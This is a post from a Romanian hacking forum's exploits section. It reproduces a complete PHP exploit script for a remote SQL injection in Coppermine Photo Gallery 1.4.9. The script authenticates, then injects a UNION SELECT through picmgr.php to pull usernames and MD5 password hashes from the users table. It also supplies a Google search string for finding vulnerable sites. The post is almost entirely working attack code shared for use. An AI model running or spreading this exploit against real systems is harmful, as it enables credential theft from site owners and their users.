Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
lutsen din Cluj
Femeie
24 ani
Cluj
cauta Barbat
24 - 48 ani
Hacking and more... / Exploituri si POCs / Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896


Code:

#!/usr/bin/php
<?php

 /*********************************************************************
 * Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability 
 * 
 * Note:
 * Requires a valid user account.
 *
 * Usage: 
 * php script.php [host] [path] [table prefix] [user id] [username] [password]
 *
 * Usage Example:
 * php script.php domain.com /coppermine/ cpg149_ 1 john secret
 *
 * Googledork"
 * "Powered by Coppermine Photo Gallery"
 *
 * Credits:
 * Disfigure - Vulnerability research and discovery
 * Synsta - Exploit scripting
 * 
 * [w4ck1ng] - w4ck1ng.com
 *********************************************************************/

if(!$argv[6]){
die("Usage:
php $argv[0] [host] [path] [table prefix] [user id] [username] [password]n
Usage Example:
php $argv[0] domain.com /coppermine/ cpg149_ 1 john secretn");
}

if($argv[6]){

function send($host,$put){
global $data;
$conn = fsockopen(gethostbyname($host),"80");
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn,$put);
}
while(!feof($conn)) {
$data .=fgets($conn);
}
fclose($conn);
return $data;
}

$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$userl = $argv[5];
$passl = $argv[6];

$post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";
$req  = "POST ".$path."login.php?referer=index.php HTTP/1.1rn"; 
$req .= "Referer: http://".$host.$path."login.php?referer=index.phprn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Content-Length: ".strlen($post)."rn";
$req .= "Connection: Closern";
$req .= "Cache-Control: no-cachernrn";
$req .= $post;
send("$host","$req");

/* Borrowed from rgod. */           
$temp = explode("Set-Cookie: ",$data);
$temp2 = explode(" ",$temp[1]);
$cookie = $temp2[0];
$temp2 = explode(" ",$temp[2]);
$cookie .= " ".str_replace(";","",$temp2[0]);
$cookie = str_replace("r","",$cookie);
$cookie = str_replace("n","",$cookie);
            
$sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");
$req =  "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1rn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Cookie: ".$cookie."rnrn";
$req .= "Connection: Closernrn";
send("$host","$req");

$gdata = explode("<option value="picture_no=1,picture_nm=",$data);
$ghash = explode(",action=0">",$gdata[1]);
$hash = $ghash[0];
$uname = explode("'",$hash);
$uname = explode("::",$uname[1]);
$username = $uname[0];
$fhash = explode("::",$hash);
$fhash = explode("',picture_sort=100",$fhash[1]);
$finalhash = $fhash[0];

if(strlen($finalhash) != 32){ 
die("Exploit failed..n"); 
}else{ 
die("Username: $username MD5: $finalhashn"); 
}
}
?>

# milw0rm.com [2006-10-27]



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
Pagini: 1  

Mergi la